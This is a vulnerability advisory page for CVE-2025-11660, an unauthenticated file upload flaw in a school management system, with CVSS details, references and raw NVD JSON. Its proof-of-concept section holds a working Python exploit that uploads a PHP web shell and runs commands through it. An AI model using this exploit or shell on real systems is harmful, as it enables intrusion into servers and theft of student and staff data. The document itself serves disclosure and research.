CVE-2025-11660

Description

A vulnerability has been found in ProjectsAndPrograms School Management System up to 6b6fae5426044f89c08d0dd101c7fa71f9042a59. Affected by this issue is some unknown functionality of the file /assets/uploadSllyabus.php. Such manipulation of the argument File leads to unrestricted upload. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:oranbyte:school_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

ProjectsAndPrograms School Management System <= commit 6b6fae5426044f89c08d0dd101c7fa71f9042a59

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11660 - School Management System Unrestricted File Upload PoC
# Vulnerability: Unrestricted upload in /assets/uploadSllyabus.php
# Affected: ProjectsAndPrograms School Management System
# Author: Security Researcher

import requests

# Target configuration
TARGET_URL = "http://target-server.com"
UPLOAD_ENDPOINT = "/assets/uploadSllyabus.php"

# Malicious PHP shell payload
PHP_SHELL = """<?php
if (isset($_REQUEST['cmd'])) {
    system($_REQUEST['cmd']);
}
?>"""

def exploit(target_url):
    """
    Exploit unrestricted file upload vulnerability in School Management System.
    Uploads a PHP web shell to gain remote code execution.
    """
    upload_url = target_url + UPLOAD_ENDPOINT

    # Prepare the malicious file for upload
    files = {
        'File': ('shell.php', PHP_SHELL, 'application/x-php')
    }

    # Send the upload request (no authentication required)
    print(f"[*] Targeting: {upload_url}")
    response = requests.post(upload_url, files=files)

    if response.status_code == 200:
        print(f"[+] Upload response: {response.text}")
        # Try common upload paths
        shell_paths = [
            f"{target_url}/assets/shell.php",
            f"{target_url}/uploads/shell.php",
            f"{target_url}/assets/uploads/shell.php"
        ]

        for shell_path in shell_paths:
            print(f"[*] Checking shell at: {shell_path}")
            check = requests.get(f"{shell_path}?cmd=id")
            if check.status_code == 200 and 'uid=' in check.text:
                print(f"[+] SUCCESS! Shell accessible at: {shell_path}")
                print(f"[+] Command output: {check.text}")
                return shell_path

    print("[-] Exploit failed")
    return None

if __name__ == "__main__":
    exploit(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11660
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11660
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11660/
[4] VulDB https://vuldb.com/cve/CVE-2025-11660
[5] https://github.com/qqy-123/cve/issues/5
[6] https://vuldb.com/?ctiid.328077
[7] https://vuldb.com/?id.328077
[8] https://vuldb.com/?submit.665610

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11660", "sourceIdentifier": "[email protected]", "published": "2025-10-13T04:15:55.707", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in ProjectsAndPrograms School Management System up to 6b6fae5426044f89c08d0dd101c7fa71f9042a59. Affected by this issue is some unknown functionality of the file /assets/uploadSllyabus.php. Such manipulation of the argument File leads to unrestricted upload. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oranbyte:school_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8F87971A-DCBD-45DE-AAD5-1C55D4E81268"}]}]}], "references": [{"url": "https://github.com/qqy-123/cve/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328077", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328077", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665610", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}